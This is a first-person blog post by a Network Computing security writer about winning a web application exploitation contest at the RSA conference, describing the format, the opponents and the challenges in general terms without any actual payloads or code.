For Hackers, By a Hacker

It can sometimes be challenging to convince folks that Network Computing is serious about the motto, "For IT, By IT" (see banner, two inches to the right). It's not just a nice sounding phrase, but a major cornerstone of the philosophy of the magazine.When I started covering the security beat, the most important challenge was learning the ins and outs of the magazine, working on my writing and other skills, not so much learning the technology. Security isn't just something I write about, it's what I do on a day-to-day basis. When talking to companies about their security products they don't always get down to the technical details, but focus on high-level discussions about why their product is different or important. Hopefully they catch on when I explain that I really do want to hear about the details of the technology itself, but sometimes it's better to show than tell, right?

To that end, I participated in the Interactive Testing Challenge at RSA last week (ok, I admit, it wasn't just for that reason -- I did it for fun, too). Carefully not called a hacking contest (by the organizers anyway), it was a three day event meant to exercise web application exploitation skills.

First of all, hats off to Security Innovation for a great contest. It can be really hard to find the right difficulty level for a live-fire scenario like that, and the sample online bank built for the event was perfect.

The most important factor in the contest besides basic web exploitation skills (cross site scripting (XSS), SQL injection, cross site request forgeries (CSRF), etc.) was speed. The top two contestants from each of the first two days competed at the end of the day in a best of three challenge for a spot in the finals on the third. The first day ended with myself and a technical staff member from the Church of Jesus Christ of Latter-Day Saints--not exactly who you'd expect to end up competing at the end of the first day of the biggest security conference in the planet.

The semi-finals each day were nerve-wracking. Announcers with microphones described the attacks and potential defenses as the audience stood around watching the two contestants on overhead displays, helping to increase the tension. Having both participated and watched, it certainly was much easier to spot the right answer when you weren't under the gun.I squeaked out a win in the tie-breaking challenge the first day with only a few seconds to spare as my opponent was right behind in the hunt to combine three injectable fields into one long javascript function. (Each field was limited in length, and the overall javascript alert needed to win required all three to be joined, with some clever escaping to re-assemble correctly after the injection)

In the finals (thanks Jeremiah for the pics and the kind words!) my competition was a skilled security officer from a large medical device company head-quartered in Switzerland. While I was lucky enough to win in only two rounds, it could have easily gone to three. I was quite glad it didn't as it turned out the final challenge would have been quite a dozy -- a multi-part problem involving reverse engineering a pseudo encryption javascript function to crack a password.

Walking away with the win (and a cool GPS and entrance to RSA next year) was a lot of fun. I get to hold my head high, post a blog entry for hackers by a hacker, and I suppose if writing doesn't work out, I might just have a future hacking--excuse me--securing web applications.